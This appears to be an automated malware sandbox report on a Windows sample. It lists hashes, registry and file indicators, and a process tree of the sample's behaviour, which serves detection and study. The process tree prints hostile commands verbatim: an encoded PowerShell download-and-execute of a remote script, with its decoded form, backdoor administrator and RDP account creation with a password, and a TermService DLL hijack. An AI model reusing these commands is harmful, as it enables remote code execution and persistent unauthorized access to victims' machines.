Overview (score 10)

Tasks
Sample                 Platform        Score
Static                 static          -
Order.exe              windows7_x64    5
Order.exe              windows10_x64   5
????? ????...DF.exe    windows7_x64    10
????? ????...DF.exe    windows10_x64   10
87597.exe              windows7_x64    10
87597.exe              windows10_x64   10
29146c1ccd...70.exe    windows7_x64    7
29146c1ccd...70.exe    windows10_x64   7
2cc3b42957...8e.exe    windows7_x64    10
2cc3b42957...8e.exe    windows10_x64   10
RICHIESTA ...TA.exe    windows7_x64    10
RICHIESTA ...TA.exe    windows10_x64   10
39c1e12e0a...25c.js    windows7_x64    1
39c1e12e0a...25c.js    windows10_x64   1
3f46e10e5f...3b.exe    windows7_x64    5
3f46e10e5f...3b.exe    windows10_x64   5
53074094ad...95dbec    linux_mipsel    -
685dce7a17...03.exe    windows7_x64    10
685dce7a17...03.exe    windows10_x64   10
6c4aab4c3b...e2.exe    windows7_x64    10
6c4aab4c3b...e2.exe    windows10_x64   10
73a52a4c60...c0.exe    windows7_x64    3
73a52a4c60...c0.exe    windows10_x64   3
Inv_7623980.exe        windows7_x64    10
Inv_7623980.exe        windows10_x64   10
8954739d96...a8.ps1    windows7_x64    8
8954739d96...a8.ps1    windows10_x64   8
USD $.exe              windows7_x64    10
USD $.exe              windows10_x64   10
91d079d937...b9.exe    windows7_x64    -
91d079d937...b9.exe    windows10_x64   -
9706247fdb...89.exe    windows7_x64    -
Analysis
max time kernel: 53s
max time network: 116s
platform: windows10_x64
resource: win10v20210410
submitted: 30-07-2021 15:25
Static task
static1

Behavioral tasks (task: sample, resource)
behavioral1: Order.exe (win7v20210410)
behavioral2: Order.exe (win10v20210410)
behavioral3: ????? ?????? ????#454326_PDF.exe (win7v20210408)
behavioral4: ????? ?????? ????#454326_PDF.exe (win10v20210410)
behavioral5: 87597.exe (win7v20210410)
behavioral6: 87597.exe (win10v20210408)
behavioral7: 29146c1ccdf280c8ac9d0c861f8bd222d2d93777c8a822da4d72c64fc3f78670.exe (win7v20210410)
behavioral8: 29146c1ccdf280c8ac9d0c861f8bd222d2d93777c8a822da4d72c64fc3f78670.exe (win10v20210408)
behavioral9: 2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe (win7v20210410)
behavioral10: 2cc3b4295747aeeb5a54b923fdbc9be766ee156c8914f5c07663f7cb1055068e.exe (win10v20210410)
behavioral11: RICHIESTA DI OFFERTA.exe (win7v20210408)
behavioral12: RICHIESTA DI OFFERTA.exe (win10v20210410)
behavioral13: 39c1e12e0ada85fa835b623a4698345bf95372bea57a7d3a5070ea1d5d5d825c.js (win7v20210408)
behavioral14: 39c1e12e0ada85fa835b623a4698345bf95372bea57a7d3a5070ea1d5d5d825c.js (win10v20210410)
behavioral15: 3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe (win7v20210408)
behavioral16: 3f46e10e5fe376b995e2947d1be21955aa8341f39d80cca737109fcf2cf2bf3b.exe (win10v20210410)
behavioral17: 53074094addc55786936f3d67d7fe36554a7c4f4f96c06252ae768707295dbec (debian9-mipsel)
behavioral18: 685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe (win7v20210408)
behavioral19: 685dce7a17356b2a9fe68600ab29af885c591d23221e8f65396478d3a1f5ae03.exe (win10v20210410)
behavioral20: 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe (win7v20210408)
behavioral21: 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe (win10v20210410)
behavioral22: 73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe (win7v20210408)
behavioral23: 73a52a4c60d253ccdb79e5d50814d1689a49fd85f9e0a40a0dc57ba7fb54e5c0.exe (win10v20210410)
behavioral24: Inv_7623980.exe (win7v20210410)
behavioral25: Inv_7623980.exe (win10v20210408)
behavioral26: 8954739d960eecd84aa64e657aed72d40567764023ba14e048778d0ebf24cba8.ps1 (win7v20210410)
behavioral27: 8954739d960eecd84aa64e657aed72d40567764023ba14e048778d0ebf24cba8.ps1 (win10v20210408)
behavioral28: USD $.exe (win7v20210410)
behavioral29: USD $.exe (win10v20210408)
behavioral30: 91d079d9371fa53227e4bb2207ba4d3aa4733feee607773b696779c5e87846b9.exe (win7v20210410)
behavioral31: 91d079d9371fa53227e4bb2207ba4d3aa4733feee607773b696779c5e87846b9.exe (win10v20210410)
behavioral32: 9706247fdb847874ca3fad6229787e37299be25d938af865a8e5b132bf313b89.exe (win7v20210408)
General
Target: 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe
Size: 4.6MB
MD5: eaee663dfeb2efcd9ec669f5622858e2
SHA1: 2b96f0d568128240d0c53b2a191467fde440fd93
SHA256: 6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2
SHA512: 211951f053ddecc6e0545a83119112d6ad375e226437d6a26ed493b362e51da3718131d59fb045c9b2feea91e04d3b82e9be4e52a46fe2e84ed4f3b4ed2213b3
Malware Config
Extracted
https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures

Grants admin privileges (1 TTPs)
Uses net.exe to modify the user's privileges.

Blocklisted process makes network request (9 IoCs)
flow  pid   process
15    2104  powershell.exe
17    2104  powershell.exe
18    2104  powershell.exe
19    2104  powershell.exe
21    2104  powershell.exe
23    2104  powershell.exe
25    2104  powershell.exe
27    2104  powershell.exe
29    2104  powershell.exe
Modifies RDP port number used by Windows (1 TTPs)

Sets DLL path for service in the registry (2 TTPs)

Resources matching YARA rule
resource                          yara_rule
\Windows\Branding\mediasrv.png    upx
\Windows\Branding\mediasvc.png    upx
Loads dropped DLL (2 IoCs)
pid   process
3164  3164

Drops file in Program Files directory (4 IoCs)
description                   ioc                                                                              process
File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT         powershell.exe
File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI         powershell.exe
File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT       powershell.exe
File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI       powershell.exe

Drops file in Windows directory (19 IoCs)
description                   ioc                                                                                                     process
File created                  C:\Windows\branding\mediasvc.png                                                                        powershell.exe
File created                  C:\Windows\branding\wupsvc.jpg                                                                          powershell.exe
File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat       powershell.exe
File opened for modification  C:\Windows\branding\wupsvc.jpg                                                                          powershell.exe
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8199.tmp                                             powershell.exe
File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  powershell.exe
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI81E8.tmp                                             powershell.exe
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8218.tmp                                             powershell.exe
File created                  C:\Windows\branding\mediasrv.png                                                                        powershell.exe
File opened for modification  C:\Windows\branding\Basebrd                                                                             powershell.exe
File opened for modification  C:\Windows\branding\mediasvc.png                                                                        powershell.exe
File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_olaj0bm5.1xs.ps1      powershell.exe
File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_bj2piuzv.0l4.psm1     powershell.exe
File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe
File opened for modification  C:\Windows\branding\ShellBrd                                                                            powershell.exe
File opened for modification  C:\Windows\branding\mediasrv.png                                                                        powershell.exe
File created                  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP                                            powershell.exe
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8229.tmp                                             powershell.exe
File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI823A.tmp                                             powershell.exe
Modifies data under HKEY_USERS (64 IoCs)
All keys below are under \REGISTRY\USER\S-1-5-20 (the NETWORK SERVICE hive). [IS] stands for Software\Microsoft\Windows\CurrentVersion\Internet Settings. The process is powershell.exe for every entry except the one marked WMIC.exe.
description      ioc
Set value (int)  [IS]\Zones\1\1400 = "0"
Set value (int)  [IS]\ZoneMap\AutoDetect = "1"
Set value (str)  [IS]\Lockdown_Zones\1\
Set value (str)  [IS]\Lockdown_Zones\2\
Set value (str)  [IS]\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313"
Key created      Software\Microsoft\SystemCertificates\CA\Certificates
Set value (str)  [IS]\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424"
Set value (int)  [IS]\Lockdown_Zones\3\CurrentLevel = "0"
Set value (str)  [IS]\Lockdown_Zones\4\
Set value (str)  [IS]\ZoneMap\ProtocolDefaults\
Set value (str)  [IS]\Lockdown_Zones\0\PMDisplayName = "Computer [Protected Mode]"
Set value (str)  [IS]\Zones\2\LowIcon = "inetcpl.cpl#005424"
Key created      Software\Microsoft\SystemCertificates\trust\CRLs
Set value (str)  [IS]\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"
Set value (int)  [IS]\Lockdown_Zones\4\Flags = "33"
Set value (int)  [IS]\Zones\2\1400 = "0"
Set value (int)  [IS]\Zones\4\1400 = "3"
Set value (str)  [IS]\ZoneMap\Ranges\
Key created      Software\Microsoft\SystemCertificates\Disallowed\Certificates
Key created      Software\Microsoft\SystemCertificates\TrustedPeople\Certificates
Set value (int)  [IS]\Zones\2\Flags = "71"
Set value (int)  [IS]\Lockdown_Zones\1\CurrentLevel = "0"
Set value (int)  [IS]\ZoneMap\ProtocolDefaults\file = "3"
Set value (str)  [IS]\Zones\0\Icon = "shell32.dll#0016"
Set value (int)  [IS]\Lockdown_Zones\2\CurrentLevel = "0"
Key created      Software\Microsoft\SystemCertificates\TrustedPeople\CTLs
Key created      Software\Microsoft\SystemCertificates\trust\CTLs
Key created      [IS]
Set value (str)  [IS]\Lockdown_Zones\0\DisplayName = "My Computer"
Set value (int)  [IS]\Lockdown_Zones\3\Flags = "33"
Set value (int)  [IS]\Lockdown_Zones\1\1400 = "1"
Key created      Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates
Key created      Software\Policies\Microsoft\SystemCertificates\CA\CRLs
Key created      Software\Microsoft\SystemCertificates\Root
Key created      Software\Microsoft\Advanced INF Setup
Set value (str)  [IS]\Zones\0\Description = "Your computer"
Set value (int)  [IS]\Zones\3\Flags = "1"
Key created      Software\Microsoft\Windows
Set value (int)  [IS]\Lockdown_Zones\4\CurrentLevel = "0"
Key created      [IS]\ZoneMap\   (WMIC.exe)
Key created      [IS]\ZoneMap\Domains
Set value (int)  [IS]\Zones\1\2500 = "3"
Set value (int)  [IS]\ZoneMap\AutoDetect = "0"
Key created      [IS]\Zones\0
Set value (str)  [IS]\Zones\2\PMDisplayName = "Trusted sites [Protected Mode]"
Key created      Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup
Key created      Software\Microsoft\SystemCertificates\TrustedPeople\CRLs
Key created      Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo
Set value (int)  [IS]\Lockdown_Zones\1\Flags = "219"
Set value (str)  [IS]\Lockdown_Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."
Set value (int)  [IS]\Lockdown_Zones\0\1400 = "1"
Key created      Software\Microsoft\SystemCertificates\Disallowed\CTLs
Set value (int)  [IS]\Zones\4\Flags = "3"
Set value (str)  [IS]\Lockdown_Zones\4\DisplayName = "Restricted sites"
Key created      Software\Policies\Microsoft\SystemCertificates\Disallowed
Set value (str)  [IS]\Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"
Key created      SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache
Set value (str)  [IS]\Zones\3\
Set value (str)  [IS]\Lockdown_Zones\0\Description = "Your computer"
Set value (str)  [IS]\Zones\
Set value (str)  [IS]\Zones\2\
Set value (str)  [IS]\Lockdown_Zones\1\LowIcon = "inetcpl.cpl#005423"
Set value (int)  [IS]\Zones\1\Flags = "219"
Set value (str)  [IS]\IE5_UA_Backup_Flag = "5.0"
Modifies registry key (1 TTPs, 1 IoCs)

Runs net.exe

Script User-Agent (4 IoCs)
Uses user-agent string associated with script host/environment.
description             flow  ioc
HTTP User-Agent header  18    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header  19    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header  21    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header  17    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses (18 IoCs)
pid   process
1200  powershell.exe
1200  powershell.exe
1200  powershell.exe
2756  powershell.exe
2756  powershell.exe
2756  powershell.exe
2276  powershell.exe
2276  powershell.exe
2276  powershell.exe
2320  powershell.exe
2320  powershell.exe
2320  powershell.exe
1200  powershell.exe
1200  powershell.exe
1200  powershell.exe
2104  powershell.exe
2104  powershell.exe
2104  powershell.exe

Suspicious behavior: LoadsDriver (2 IoCs)
pid   process
620   620
Suspicious use of AdjustPrivilegeToken (64 IoCs, grouped by process; token names in the order reported)
pid 1200 powershell.exe: SeDebugPrivilege
pid 2756 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
pid 2276 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
pid 2320 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33
Suspicious use of WriteProcessMemory (64 IoCs; each source/target pair was reported twice)
source pid  source process                                                             target pid  target process   count
3904        6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe      1200        powershell.exe   2
1200        powershell.exe                                                             744         csc.exe          2
744         csc.exe                                                                    3988        cvtres.exe       2
1200        powershell.exe                                                             2756        powershell.exe   2
1200        powershell.exe                                                             2276        powershell.exe   2
1200        powershell.exe                                                             2320        powershell.exe   2
1200        powershell.exe                                                             2164        reg.exe          2
1200        powershell.exe                                                             3988        reg.exe          2
1200        powershell.exe                                                             1680        reg.exe          2
1200        powershell.exe                                                             3984        net.exe          2
3984        net.exe                                                                    2200        net1.exe         2
1200        powershell.exe                                                             4040        cmd.exe          2
4040        cmd.exe                                                                    1304        cmd.exe          2
1304        cmd.exe                                                                    1880        net.exe          2
1880        net.exe                                                                    3600        net1.exe         2
1200        powershell.exe                                                             2164        cmd.exe          2
2164        cmd.exe                                                                    3736        cmd.exe          2
3736        cmd.exe                                                                    2784        net.exe          2
2784        net.exe                                                                    3964        net1.exe         2
2700        cmd.exe                                                                    3588        net.exe          2
3588        net.exe                                                                    1680        net1.exe         2
2136        cmd.exe                                                                    1560        net.exe          2
1560        net.exe                                                                    3136        net1.exe         2
3852        cmd.exe                                                                    2200        net.exe          2
2200        net.exe                                                                    2316        net1.exe         2
960         cmd.exe                                                                    1244        net.exe          2
1244        net.exe                                                                    2352        net1.exe         2
1532        cmd.exe                                                                    3960        net.exe          2
3960        net.exe                                                                    2080        net1.exe         2
188         cmd.exe                                                                    3980        net.exe          2
3980        net.exe                                                                    3424        net1.exe         2
800         cmd.exe                                                                    2320        WMIC.exe         2
Processes
Indentation shows parent/child depth. Each entry gives the image path and PID, the command line, and the signatures the sandbox attached to that process. Bracketed remarks are editorial.

C:\Users\Admin\AppData\Local\Temp\6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe  (PID 3904)
  cmdline: "C:\Users\Admin\AppData\Local\Temp\6c4aab4c3bd1ba8f77a781d70ecbc1b4c7dfd9d3c7ad60158fb8d35d1d4246e2.exe"
  signatures: Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 1200)
    cmdline: "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
    signatures: Drops file in Windows directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory

    C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe  (PID 744)
      cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\likclxcl\likclxcl.cmdline"
      signatures: Suspicious use of WriteProcessMemory

      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe  (PID 3988)
        cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES403B.tmp" "c:\Users\Admin\AppData\Local\Temp\likclxcl\CSC481DC0B26B0F48F6857BB171B79C72BC.TMP"

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2756)
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2276)
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2320)
      cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
      signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

    C:\Windows\system32\reg.exe  (PID 2164)
      cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
      [0x1C21 = 7201 decimal: RDP is moved off the default port 3389]

    C:\Windows\system32\reg.exe  (PID 3988)
      cmdline: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
      signatures: Modifies registry key
      [the default ServiceDLL for TermService is %SystemRoot%\System32\termsrv.dll; mediasrv.png is one of the two dropped files that matched the upx YARA rule above]

    C:\Windows\system32\reg.exe  (PID 1680)
      cmdline: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f

    C:\Windows\system32\net.exe  (PID 3984)
      cmdline: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
      signatures: Suspicious use of WriteProcessMemory

      C:\Windows\system32\net1.exe  (PID 2200)
        cmdline: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add

    C:\Windows\system32\cmd.exe  (PID 4040)
      cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
      signatures: Suspicious use of WriteProcessMemory

      C:\Windows\system32\cmd.exe  (PID 1304)
        cmdline: cmd /c net start rdpdr
        signatures: Suspicious use of WriteProcessMemory

        C:\Windows\system32\net.exe  (PID 1880)
          cmdline: net start rdpdr
          signatures: Suspicious use of WriteProcessMemory

          C:\Windows\system32\net1.exe  (PID 3600)
            cmdline: C:\Windows\system32\net1 start rdpdr

    C:\Windows\system32\cmd.exe  (PID 2164)
      cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
      signatures: Suspicious use of WriteProcessMemory

      C:\Windows\system32\cmd.exe  (PID 3736)
        cmdline: cmd /c net start TermService
        signatures: Suspicious use of WriteProcessMemory

        C:\Windows\system32\net.exe  (PID 2784)
          cmdline: net start TermService
          signatures: Suspicious use of WriteProcessMemory

          C:\Windows\system32\net1.exe  (PID 3964)
            cmdline: C:\Windows\system32\net1 start TermService

    C:\Windows\system32\cmd.exe  (PID 3332)
      cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f

    C:\Windows\system32\cmd.exe  (PID 3984)
      cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

C:\Windows\System32\cmd.exe  (PID 2700)
  cmdline: cmd /C net.exe user WgaUtilAcc 000000 /del
  signatures: Suspicious use of WriteProcessMemory

  C:\Windows\system32\net.exe  (PID 3588)
    cmdline: net.exe user WgaUtilAcc 000000 /del
    signatures: Suspicious use of WriteProcessMemory

    C:\Windows\system32\net1.exe  (PID 1680)
      cmdline: C:\Windows\system32\net1 user WgaUtilAcc 000000 /del

C:\Windows\System32\cmd.exe  (PID 2136)
  cmdline: cmd /C net.exe user WgaUtilAcc zr0Htc6U /add
  signatures: Suspicious use of WriteProcessMemory

  C:\Windows\system32\net.exe  (PID 1560)
    cmdline: net.exe user WgaUtilAcc zr0Htc6U /add
    signatures: Suspicious use of WriteProcessMemory

    C:\Windows\system32\net1.exe  (PID 3136)
      cmdline: C:\Windows\system32\net1 user WgaUtilAcc zr0Htc6U /add

C:\Windows\System32\cmd.exe  (PID 3852)
  cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
  signatures: Suspicious use of WriteProcessMemory

  C:\Windows\system32\net.exe  (PID 2200)
    cmdline: net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
    signatures: Suspicious use of WriteProcessMemory

    C:\Windows\system32\net1.exe  (PID 2316)
      cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe  (PID 960)
  cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
  signatures: Suspicious use of WriteProcessMemory

  C:\Windows\system32\net.exe  (PID 1244)
    cmdline: net.exe LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD
    signatures: Suspicious use of WriteProcessMemory

    C:\Windows\system32\net1.exe  (PID 2352)
      cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RJMQBVDN$ /ADD

C:\Windows\System32\cmd.exe  (PID 1532)
  cmdline: cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
  signatures: Suspicious use of WriteProcessMemory

  C:\Windows\system32\net.exe  (PID 3960)
    cmdline: net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
    signatures: Suspicious use of WriteProcessMemory

    C:\Windows\system32\net1.exe  (PID 2080)
      cmdline: C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD

C:\Windows\System32\cmd.exe  (PID 188)
  cmdline: cmd /C net.exe user WgaUtilAcc zr0Htc6U
  signatures: Suspicious use of WriteProcessMemory

  C:\Windows\system32\net.exe  (PID 3980)
    cmdline: net.exe user WgaUtilAcc zr0Htc6U
    signatures: Suspicious use of WriteProcessMemory

    C:\Windows\system32\net1.exe  (PID 3424)
      cmdline: C:\Windows\system32\net1 user WgaUtilAcc zr0Htc6U

C:\Windows\System32\cmd.exe  (PID 800)
  cmdline: cmd.exe /C wmic path win32_VideoController get name
  signatures: Suspicious use of WriteProcessMemory

  C:\Windows\System32\Wbem\WMIC.exe  (PID 2320)
    cmdline: wmic path win32_VideoController get name
    signatures: Modifies data under HKEY_USERS

C:\Windows\System32\cmd.exe  (PID 2136)
  cmdline: cmd.exe /C wmic CPU get NAME

  C:\Windows\System32\Wbem\WMIC.exe  (PID 1520)
    cmdline: wmic CPU get NAME

C:\Windows\System32\cmd.exe  (PID 3852)
  cmdline: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

  C:\Windows\system32\cmd.exe  (PID 2328)
    cmdline: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID 2104)
      cmdline: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      signatures: Blocklisted process makes network request; Drops file in Program Files directory; Drops file in Windows directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses
      [the -enc payload is UTF-16LE base64 and decodes to: IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1"), the URL listed under Malware Config above]
Network
MITRE ATT&CK Enterprise v6
Downloads